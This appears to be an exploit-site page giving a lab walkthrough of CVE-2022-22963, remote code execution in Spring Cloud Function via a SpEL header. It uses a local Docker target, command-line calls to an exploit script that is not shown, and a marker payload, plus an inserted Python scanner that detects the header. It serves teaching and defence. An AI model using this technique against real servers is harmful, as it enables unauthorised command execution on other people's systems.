## https://sploitus.com/exploit?id=A4DE7943-235D-5CDA-9110-735BB44BC3A8
# CVE-2022-22963 - Demo Methodology
## ⚠️ Overview
This demo shows a **Remote Code Execution (RCE)** vulnerability in Spring Cloud Function.
The vulnerability allows execution of system commands through SpEL injection via the HTTP header:
```
spring.cloud.function.routing-expression
```
This is a **blind RCE**, meaning:
- commands execute on the target
- but **no output is returned in the HTTP response**
---
# 1. Start the Vulnerable Docker Container
```bash
docker run -p 8080:8080 spring4shell/cve-2022-22963
```
Verify:
```bash
curl http://127.0.0.1:8080
```
---
# 2. Save the Exploit
Save as:
```bash
exploit.py
```
---
# 3. Execute Commands
## Basic Syntax
```bash
python exploit.py http://127.0.0.1:8080 "<command>"
```
---
# 4. Demonstration Payloads (Blind RCE)
⚠️ All results must be verified inside the container (`docker exec`).
---
## Create a marker file (proof of execution)
```bash
python exploit.py http://127.0.0.1:8080 "touch /tmp/pwned"
```
---
# 5. Verify Impact (Inside Docker)
List containers:
```bash
docker ps
```
Enter the container:
```bash
docker exec -it <container_id> bash
```
Check results:
```bash
ls /tmp
cat /tmp/demo.txt
cat /tmp/pwned
```
---
# 6. Key Notes
- This is a **Blind RCE**
- HTTP response does NOT contain command output
- HTTP `500 Internal Server Error` is expected even when execution succeeds
- Impact is demonstrated via:
  - file creation
  - file modification
  - filesystem changes inside container
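
A defender-side check for the behaviour noted above, as an added example (not part of the original demo or the exploit script): it scans captured request/response pairs for the `spring.cloud.function.routing-expression` header and flags them regardless of status code. The sample traffic and the names `Finding`, `parse_request_head` and `scan` are constructed for illustration.

```python
from dataclasses import dataclass

# Header name taken from this page; HTTP header names are case-insensitive.
ROUTING_HEADER = "spring.cloud.function.routing-expression"


@dataclass
class Finding:
    request_line: str
    status: int
    expression: str
    note: str


def parse_request_head(raw: str):
    """Split a raw HTTP request into its request line and lower-cased headers."""
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    lines = head.split("\n")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def scan(exchanges):
    """Flag every (raw_request, response_status) pair that carries the header."""
    findings = []
    for raw, status in exchanges:
        request_line, headers = parse_request_head(raw)
        if ROUTING_HEADER not in headers:
            continue
        # Blind RCE: the status code says nothing about whether the command ran.
        note = ("500 is expected even when execution succeeds" if status == 500
                else "no command output in response; check the host")
        findings.append(Finding(request_line, status, headers[ROUTING_HEADER], note))
    return findings


# Constructed sample traffic (placeholder expression, not a working payload).
SAMPLES = [
    ("POST / HTTP/1.1\r\nHost: 127.0.0.1:8080\r\n"
     "Spring.Cloud.Function.Routing-Expression: <expression>\r\n\r\ndata", 500),
    ("GET / HTTP/1.1\r\nHost: 127.0.0.1:8080\r\n\r\n", 200),
    # Header name appears only in the body: must not be flagged.
    ("POST / HTTP/1.1\r\nHost: 127.0.0.1:8080\r\n\r\n"
     "spring.cloud.function.routing-expression: <expression>", 200),
]

if __name__ == "__main__":
    for f in scan(SAMPLES):
        print(f)
```

Standard access-log formats do not record arbitrary request headers, so this check needs input from a proxy, WAF or packet capture that does.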
---
# 7. What this proves
This vulnerability allows:
- Remote command execution
- Full control over container runtime
- File system manipulation
- Potential container compromise
---